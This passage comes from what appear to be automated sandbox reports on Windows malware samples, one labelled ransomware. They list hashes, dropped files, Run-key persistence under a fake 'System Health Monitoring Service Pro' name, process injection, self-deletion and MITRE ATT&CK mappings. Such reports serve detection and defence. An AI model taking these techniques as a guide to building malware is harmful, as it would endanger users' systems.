\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has a section named \".eh_fram\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" wrote 16128 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002944]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 192)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 192)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 192)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc
https://hybrid-analysis.com/sample/7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc
Hybrid Analysis - Ransomware
{"size": 606080, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc", "sha256": "7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 140, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606084, "sha256": "daa0e25384f5c5d8c12600b2babf0a4dc0d49db76f6e105e2a71a7fe4ff5f271", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "085cda53603755dc.exe (PID: 4968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004852", "name": "7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe", "normalized_path": "C:\\7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe", "sha256": "7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc"}, {"uid": "00000000-00004968", "parentuid": "00000000-00004852", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe *", "sha256": "daa0e25384f5c5d8c12600b2babf0a4dc0d49db76f6e105e2a71a7fe4ff5f271"}, {"uid": "00000000-00004944", "parentuid": "00000000-00004968", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZVQTRG", "sha256": "daa0e25384f5c5d8c12600b2babf0a4dc0d49db76f6e105e2a71a7fe4ff5f271"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, 